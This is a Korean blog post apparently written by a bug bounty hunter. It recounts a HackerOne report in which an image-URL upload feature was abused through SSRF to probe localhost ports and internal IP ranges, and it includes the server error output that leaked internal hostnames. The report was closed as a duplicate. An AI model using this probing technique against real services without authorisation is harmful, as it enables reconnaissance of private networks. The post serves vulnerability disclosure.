[hackerone] - 너무 많이 늦은 버그 바운티 제보
Title
Internal Ports Scanning and IPs Scanning via SSRF
Weakness
SSRF
이번에 제보한 보고서는 SSRF 취약점 이다.
SSRF 공격으로 내부 IP 또는 Port를 스캔 할 수 있다.
해당 사이트는 이미지를 업로드 하거나, 이미지 URL를 입력하여 서버가 그 이미지를 가져오는 기능이 있다.
혹시나 하는 마음에 http://127.0.0.1 라고 입력했는데 아래와 같은 결과가 출력 되었다.
[127.0.0.1]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)
Error 내용을 보면 127.0.0.1에 요청을 보냈는데, 503 을 받았다....
즉, SSRF 공격이 가능하다는 뜻이다.
Port 스캔을 하기 위해 알려진 포트를 토대로 요청을 날렸지만, 결과는 그닥 도움은 되지 않았다.
>> https://127.0.0.1:0
{"data":{"error":{"code":1011,"message":"[127.0.0.1:0]: Invalid URL (https:\/\/127.0.0.1:0)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":400}
>> https://127.0.0.1:1
{"data":{"error":{"code":2011,"message":"[127.0.0.1:1]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:7
{"data":{"error":{"code":2011,"message":"[127.0.0.1:7]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:9
{"data":{"error":{"code":2011,"message":"[127.0.0.1:9]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...
...
>> https://127.0.0.1:443
{"data":{"error":{"code":2011,"message":"[127.0.0.1:443]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...
Port 스캔은 포기하고 내부 IP들로만 입력하여 어떠한 결과를 출력하는지 봤다.
우선 `192.168.0.0/24` 대역을 쭉 요청 날려 봤는데, 위 내용과는 다른 `time out` 이 뜬다.
>> https://192.168.0.128
{"data":{"error":{"code":2011,"message":"[192.168.0.128]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.64
{"data":{"error":{"code":2011,"message":"[192.168.0.64]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.32
{"data":{"error":{"code":2011,"message":"[192.168.0.32]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.192
{"data":{"error":{"code":2011,"message":"[192.168.0.192]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.1
{"data":{"error":{"code":2011,"message":"[192.168.0.1]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
`172.16.0.0/24` 대역으로 요청을 날렸는데, 도움이 될만한 정보가 출력이 되었다.
몇몇 내부 IP는 각각의 내부 도메인을 가지고 있었고, 도메인 이름이 출력 되는 것을 볼 수 있다.
>> https://172.16.0.163
[172.16.0.163]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'larynx.domain-name.com' does not match target host name '172.16.0.163')
>> https://172.16.0.131
[172.16.0.131]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.131')
>> https://172.16.0.132
[172.16.0.132]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.132')
>> https://172.16.0.135
[172.16.0.135]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.135')
>> https://172.16.0.102
[172.16.0.102]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.102')
>> https://172.16.0.8
[172.16.0.8]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.8')
>> https://172.16.0.12
[172.16.0.12]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'browserevents.domain-name.com' does not match target host name '172.16.0.12')
>> https://172.16.0.109
[172.16.0.109]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)
>> https://172.16.0.45
[172.16.0.45]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.45')
>> https://172.16.0.176
[172.16.0.176]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'monitor.production.domain-name-ops.com' does not match target host name '172.16.0.176')
>> https://172.16.0.117
[172.16.0.117]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.117')
>> https://172.16.0.155
[172.16.0.155]: Image could not be downloaded (curl error: 28; Operation timed out after 0 milliseconds with 0 out of 0 bytes received)
>> https://172.16.0.158
[172.16.0.158]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.158')
해당 사이트는 SSRF 공격에 취약하니, 내부 도메인을 적어 요청 보내면 어떤 결과를 얻을 수 있을까 생각했지만...
그 내부망의 이미지라도 보고 싶었는데,, 나오지는 않더라..
그래서 일단 SSRF 취약점이 존재하니 hackerone에 제보를 했고, BOT이 일단 나중에 연락할테니 기다리라고 한다.
근데 몇시간 뒤 누군가 코멘트를 달았는데, 읽어보니.... 이미 누군가 똑같은 취약점을 제보 했다라고...
이 코멘트 작성자는 나에게 리포트를 공유했고, 읽어보니 3년전에 누군가 벌써 제보를 했던 거였다.
웃긴건 나 외에 10명 이상 나와 같은 리포트를 제출했고, 댓글에는 "3년이 지났는데 왜 아직도 안고치고 있냐, 다른 사람들이 시간 낭비를 하고 있지 않느냐" 라는게 적혀있었다..
결론은 내가 제출한 리포트는 중복 처리 되었다.
암튼... real world 에서 이런 취약점을 발견한 것 만으로 만족하자...